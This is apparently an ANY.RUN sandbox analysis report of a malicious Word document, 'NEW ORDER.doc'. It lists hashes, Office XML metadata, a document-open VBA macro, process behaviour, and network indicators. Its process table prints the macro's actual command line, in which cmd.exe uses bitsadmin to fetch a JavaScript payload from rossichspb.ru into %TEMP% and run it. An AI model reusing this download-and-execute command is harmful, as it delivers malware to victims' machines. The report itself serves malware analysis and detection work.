File name:

NEW ORDER.doc

Full analysis: https://app.any.run/tasks/fda98227-1f0e-4a5b-841c-cd36da11237d
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: January 10, 2019, 16:18:18
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: text/xml
File info: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5:

B62934A90F6B6AB6A84DDB9478562D1F

SHA1:

A1DF15C01C93D9E6D711ACEC1670A0976BD390D8

SHA256:

584D0949DD689D3D4C825B499D1A093FC9FE274CB8D04B52116B90F994A5753F

SSDEEP:

3072:E92vUDrEWmbmvDuBUKTrXraCtHlpORaAs/vUEMVXpKxL:EJfBSBUKTrOwl0hsXUEM9o

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses BITADMIN.EXE for downloading application

      • cmd.exe (PID: 4092)

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2860)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2860)

  • SUSPICIOUS

    No suspicious indicators.

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2860)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2860)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (43.7)
.rels | Open Office XML Relationships (28.2)
.xml | Microsoft Office XML Flat File Format (ASCII) (20.8)
.svg | Scalable Vector Graphics (var.3) (4.5)
.xml | Generic XML (ASCII) (1.5)

EXIF

XMP

PackagePartName: /_rels/.rels
PackagePartContentType: application/vnd.openxmlformats-package.relationships+xml
PackagePartPadding: 512
PackagePartXmlDataRelationshipsXmlns: http://schemas.openxmlformats.org/package/2006/relationships
PackagePartXmlDataRelationshipsRelationshipId: rId3
PackagePartXmlDataRelationshipsRelationshipType: http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties
PackagePartXmlDataRelationshipsRelationshipTarget: docProps/app.xml
PackagePartXmlDataDocumentIgnorable: w14 w15 wp14
PackagePartXmlDataDocumentBodyPRsidR: 001F716E
PackagePartXmlDataDocumentBodyPRsidRDefault: 003B3DF3
PackagePartXmlDataDocumentBodyPBookmarkStartId: -
PackagePartXmlDataDocumentBodyPBookmarkStartName: _GoBack
PackagePartXmlDataDocumentBodyPBookmarkEndId: -
PackagePartXmlDataDocumentBodyPRRPrNoProof: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDistT: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDistB: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDistL: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDistR: -
PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCx: 4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCy: 4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentL: -
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentT: -
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentR: -
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentB: -
PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrId: 1
PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrName: Picture 1
PackagePartXmlDataDocumentBodyPRDrawingInlineCNvGraphicFramePr: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataUri: http://schemas.openxmlformats.org/drawingml/2006/picture
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrId: 1
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrName: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPicPr: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipEmbed: rId5
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUri: {28A0092B-C50C-407E-A947-70E740481C1C}
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillStretchFillRect: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffX: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffY: -
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCx: 4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCy: 4649492
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomPrst: rect
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomAvLst: -
PackagePartXmlDataDocumentBodySectPrRsidR: 001F716E
PackagePartXmlDataDocumentBodySectPrPgSzW: 12240
PackagePartXmlDataDocumentBodySectPrPgSzH: 15840
PackagePartXmlDataDocumentBodySectPrPgMarTop: 1440
PackagePartXmlDataDocumentBodySectPrPgMarRight: 1440
PackagePartXmlDataDocumentBodySectPrPgMarBottom: 1440
PackagePartXmlDataDocumentBodySectPrPgMarLeft: 1440
PackagePartXmlDataDocumentBodySectPrPgMarHeader: 720
PackagePartXmlDataDocumentBodySectPrPgMarFooter: 720
PackagePartXmlDataDocumentBodySectPrPgMarGutter: -
PackagePartXmlDataDocumentBodySectPrColsSpace: 720
PackagePartXmlDataDocumentBodySectPrDocGridLinePitch: 360
PackagePartBinaryData: (Binary data 49746 bytes, use -b option to extract)
PackagePartCompression: store
PackagePartXmlDataThemeName: Office Theme
PackagePartXmlDataThemeThemeElementsClrSchemeName: Office
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrVal: windowText
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrLastClr: 000000
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrVal: window
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrLastClr: FFFFFF
PackagePartXmlDataThemeThemeElementsClrSchemeDk2SrgbClrVal: 44546A
PackagePartXmlDataThemeThemeElementsClrSchemeLt2SrgbClrVal: E7E6E6
PackagePartXmlDataThemeThemeElementsClrSchemeAccent1SrgbClrVal: 5B9BD5
PackagePartXmlDataThemeThemeElementsClrSchemeAccent2SrgbClrVal: ED7D31
PackagePartXmlDataThemeThemeElementsClrSchemeAccent3SrgbClrVal: A5A5A5
PackagePartXmlDataThemeThemeElementsClrSchemeAccent4SrgbClrVal: FFC000
PackagePartXmlDataThemeThemeElementsClrSchemeAccent5SrgbClrVal: 4472C4
PackagePartXmlDataThemeThemeElementsClrSchemeAccent6SrgbClrVal: 70AD47
PackagePartXmlDataThemeThemeElementsClrSchemeHlinkSrgbClrVal: 0563C1
PackagePartXmlDataThemeThemeElementsClrSchemeFolHlinkSrgbClrVal: 954F72
PackagePartXmlDataThemeThemeElementsFontSchemeName: Office
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinTypeface: Calibri Light
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinPanose: 020F0302020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontEaTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontCsTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontScript: Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontTypeface: MS ゴシック
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinTypeface: Calibri
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinPanose: 020F0502020204030204
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontEaTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontCsTypeface: -
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontScript: Jpan
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontTypeface: MS 明朝
PackagePartXmlDataThemeThemeElementsFmtSchemeName: Office
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillRotWithShape: 1
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsPos: -
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrLumModVal: 110000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrSatModVal: 105000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrTintVal: 67000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinAng: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinScaled: -
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrShadeVal: 100000
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnW: 6350
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCap: flat
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCmpd: sng
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnAlgn: ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnPrstDashVal: solid
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnMiterLim: 800000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLst: -
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwBlurRad: 57150
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDist: 19050
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDir: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwAlgn: ctr
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwRotWithShape: -
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrVal: 000000
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrAlphaVal: 63000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrTintVal: 95000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrSatModVal: 170000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillRotWithShape: 1
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsPos: -
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrVal: phClr
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrTintVal: 93000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrSatModVal: 150000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrShadeVal: 98000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrLumModVal: 102000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinAng: 5400000
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinScaled: -
PackagePartXmlDataThemeObjectDefaults: -
PackagePartXmlDataThemeExtraClrSchemeLst: -
PackagePartXmlDataThemeExtLstExtUri: {05A4C25C-085E-4340-85A3-A5531E510DB2}
PackagePartXmlDataThemeExtLstExtThemeFamilyName: Office Theme
PackagePartXmlDataThemeExtLstExtThemeFamilyId: {62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}
PackagePartXmlDataThemeExtLstExtThemeFamilyVid: {4A3C46E8-61CC-4603-A589-7422A47A8E4A}
PackagePartXmlDataVbaSuppDataIgnorable: w14 w15 wp14
PackagePartXmlDataVbaSuppDataDocEventsEventDocOpen: -
PackagePartXmlDataVbaSuppDataMcdsMcdMacroName: PROJECT.UFFZDAYWDUVDCXK.FLDDVPAKCWCFUOGUYHQP
PackagePartXmlDataVbaSuppDataMcdsMcdName: Project.UffzDaYWduvDCXK.FLdDVPAkcwcFUogUYhQP
PackagePartXmlDataVbaSuppDataMcdsMcdBEncrypt: 00
PackagePartXmlDataVbaSuppDataMcdsMcdCmg: 56
PackagePartXmlDataSettingsIgnorable: w14 w15
PackagePartXmlDataSettingsZoomPercent: 100
PackagePartXmlDataSettingsDefaultTabStopVal: 720
PackagePartXmlDataSettingsCharacterSpacingControlVal: doNotCompress
PackagePartXmlDataSettingsCompatCompatSettingName: compatibilityMode
PackagePartXmlDataSettingsCompatCompatSettingUri: http://schemas.microsoft.com/office/word
PackagePartXmlDataSettingsCompatCompatSettingVal: 15
PackagePartXmlDataSettingsRsidsRsidRootVal: 003B3DF3
PackagePartXmlDataSettingsRsidsRsidVal: 001F716E
PackagePartXmlDataSettingsMathPrMathFontVal: Cambria Math
PackagePartXmlDataSettingsMathPrBrkBinVal: before
PackagePartXmlDataSettingsMathPrBrkBinSubVal: --
PackagePartXmlDataSettingsMathPrSmallFracVal: -
PackagePartXmlDataSettingsMathPrDispDef: -
PackagePartXmlDataSettingsMathPrLMarginVal: -
PackagePartXmlDataSettingsMathPrRMarginVal: -
PackagePartXmlDataSettingsMathPrDefJcVal: centerGroup
PackagePartXmlDataSettingsMathPrWrapIndentVal: 1440
PackagePartXmlDataSettingsMathPrIntLimVal: subSup
PackagePartXmlDataSettingsMathPrNaryLimVal: undOvr
PackagePartXmlDataSettingsThemeFontLangVal: en-US
PackagePartXmlDataSettingsClrSchemeMappingBg1: light1
PackagePartXmlDataSettingsClrSchemeMappingT1: dark1
PackagePartXmlDataSettingsClrSchemeMappingBg2: light2
PackagePartXmlDataSettingsClrSchemeMappingT2: dark2
PackagePartXmlDataSettingsClrSchemeMappingAccent1: accent1
PackagePartXmlDataSettingsClrSchemeMappingAccent2: accent2
PackagePartXmlDataSettingsClrSchemeMappingAccent3: accent3
PackagePartXmlDataSettingsClrSchemeMappingAccent4: accent4
PackagePartXmlDataSettingsClrSchemeMappingAccent5: accent5
PackagePartXmlDataSettingsClrSchemeMappingAccent6: accent6
PackagePartXmlDataSettingsClrSchemeMappingHyperlink: hyperlink
PackagePartXmlDataSettingsClrSchemeMappingFollowedHyperlink: followedHyperlink
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsExt: edit
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsSpidmax: 1026
PackagePartXmlDataSettingsShapeDefaultsShapelayoutExt: edit
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapExt: edit
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapData: 1
PackagePartXmlDataSettingsDecimalSymbolVal: .
PackagePartXmlDataSettingsListSeparatorVal: ,
PackagePartXmlDataSettingsChartTrackingRefBased: -
PackagePartXmlDataSettingsDocIdVal: {6B02E763-C495-42BF-82DE-678220608874}
PackagePartXmlDataPropertiesXmlns: http://schemas.openxmlformats.org/officeDocument/2006/extended-properties
PackagePartXmlDataPropertiesTemplate: Normal.dotm
PackagePartXmlDataPropertiesTotalTime: -
PackagePartXmlDataPropertiesPages: 1
PackagePartXmlDataPropertiesWords: -
PackagePartXmlDataPropertiesCharacters: 1
PackagePartXmlDataPropertiesApplication: Microsoft Office Word
PackagePartXmlDataPropertiesDocSecurity: -
PackagePartXmlDataPropertiesLines: 1
PackagePartXmlDataPropertiesParagraphs: 1
PackagePartXmlDataPropertiesScaleCrop: -
PackagePartXmlDataPropertiesCompany: -
PackagePartXmlDataPropertiesLinksUpToDate: -
PackagePartXmlDataPropertiesCharactersWithSpaces: 1
PackagePartXmlDataPropertiesSharedDoc: -
PackagePartXmlDataPropertiesHyperlinksChanged: -
PackagePartXmlDataPropertiesAppVersion: 15
PackagePartXmlDataStylesIgnorable: w14 w15
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsAsciiTheme: minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsEastAsiaTheme: minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsHAnsiTheme: minorHAnsi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsCstheme: minorBidi
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzVal: 22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzCsVal: 22
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangVal: en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangEastAsia: en-US
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangBidi: ar-SA
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingAfter: 160
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLine: 259
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLineRule: auto
PackagePartXmlDataStylesLatentStylesDefLockedState: -
PackagePartXmlDataStylesLatentStylesDefUIPriority: 99
PackagePartXmlDataStylesLatentStylesDefSemiHidden: -
PackagePartXmlDataStylesLatentStylesDefUnhideWhenUsed: -
PackagePartXmlDataStylesLatentStylesDefQFormat: -
PackagePartXmlDataStylesLatentStylesCount: 371
PackagePartXmlDataStylesLatentStylesLsdExceptionName: Normal
PackagePartXmlDataStylesLatentStylesLsdExceptionUiPriority: -
PackagePartXmlDataStylesLatentStylesLsdExceptionQFormat: 1
PackagePartXmlDataStylesLatentStylesLsdExceptionSemiHidden: 1
PackagePartXmlDataStylesLatentStylesLsdExceptionUnhideWhenUsed: 1
PackagePartXmlDataStylesStyleType: paragraph
PackagePartXmlDataStylesStyleDefault: 1
PackagePartXmlDataStylesStyleStyleId: Normal
PackagePartXmlDataStylesStyleNameVal: Normal
PackagePartXmlDataStylesStyleQFormat: -
PackagePartXmlDataStylesStyleUiPriorityVal: 1
PackagePartXmlDataStylesStyleSemiHidden: -
PackagePartXmlDataStylesStyleUnhideWhenUsed: -
PackagePartXmlDataStylesStyleTblPrTblIndW: -
PackagePartXmlDataStylesStyleTblPrTblIndType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarTopW: -
PackagePartXmlDataStylesStyleTblPrTblCellMarTopType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftW: 108
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomW: -
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomType: dxa
PackagePartXmlDataStylesStyleTblPrTblCellMarRightW: 108
PackagePartXmlDataStylesStyleTblPrTblCellMarRightType: dxa
PackagePartXmlDataCorePropertiesTitle: -
PackagePartXmlDataCorePropertiesSubject: -
PackagePartXmlDataCorePropertiesCreator: omoba
PackagePartXmlDataCorePropertiesKeywords: -
PackagePartXmlDataCorePropertiesDescription: -
PackagePartXmlDataCorePropertiesLastModifiedBy: omoba
PackagePartXmlDataCorePropertiesRevision: 1
PackagePartXmlDataCorePropertiesCreatedType: dcterms:W3CDTF
PackagePartXmlDataCorePropertiesCreated: 2018:02:19 14:41:00Z
PackagePartXmlDataCorePropertiesModifiedType: dcterms:W3CDTF
PackagePartXmlDataCorePropertiesModified: 2018:02:19 14:41:00Z
PackagePartXmlDataFontsIgnorable: w14 w15
PackagePartXmlDataFontsFontName: Calibri
PackagePartXmlDataFontsFontPanose1Val: 020F0502020204030204
PackagePartXmlDataFontsFontCharsetVal: 00
PackagePartXmlDataFontsFontFamilyVal: swiss
PackagePartXmlDataFontsFontPitchVal: variable
PackagePartXmlDataFontsFontSigUsb0: E0002AFF
PackagePartXmlDataFontsFontSigUsb1: C000247B
PackagePartXmlDataFontsFontSigUsb2: 00000009
PackagePartXmlDataFontsFontSigUsb3: 00000000
PackagePartXmlDataFontsFontSigCsb0: 000001FF
PackagePartXmlDataFontsFontSigCsb1: 00000000
PackagePartXmlDataWebSettingsIgnorable: w14 w15
PackagePartXmlDataWebSettingsOptimizeForBrowser: -
PackagePartXmlDataWebSettingsAllowPNG: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs bitsadmin.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2660bitsadmin /transfer CXyvYqZGwvAFrGLHa /priority foreground http://rossichspb.ru/c/tt.js C:\Users\admin\AppData\Local\Temp\Name.js C:\Windows\system32\bitsadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
BITS administration utility
Exit code:
2149122452
Version:
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
2860"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\NEW ORDER.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
4092cmd.exe /C CD C: & bitsadmin /transfer CXyvYqZGwvAFrGLHa /priority foreground http://rossichspb.ru/c/tt.js %TEMP%\Name.js && start %TEMP%\Name.jsC:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2149122452
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
Total events
1 322
Read events
716
Write events
601
Delete events
5

Modification events

(PID) Process:(2860) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:#:$
Value:
233A24002C0B0000010000000000000000000000
(PID) Process:(2860) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2860) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2860) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1311375390
(PID) Process:(2860) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1311375504
(PID) Process:(2860) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1311375505
(PID) Process:(2860) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
2C0B0000BAADD42500A9D40100000000
(PID) Process:(2860) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:8<$
Value:
383C24002C0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2860) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:8<$
Value:
383C24002C0B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2860) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
0
Suspicious files
0
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2860WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8A83.tmp.cvr
MD5:
SHA256:
2860WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$W ORDER.docpgc
MD5:
SHA256:
2860WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
HEAD
404
87.236.16.54:80
http://rossichspb.ru/c/tt.js
RU
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
87.236.16.54:80
rossichspb.ru
Beget Ltd
RU
malicious

DNS requests

Domain
IP
Reputation
rossichspb.ru
  • 87.236.16.54
malicious

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
NEW ORDER.doc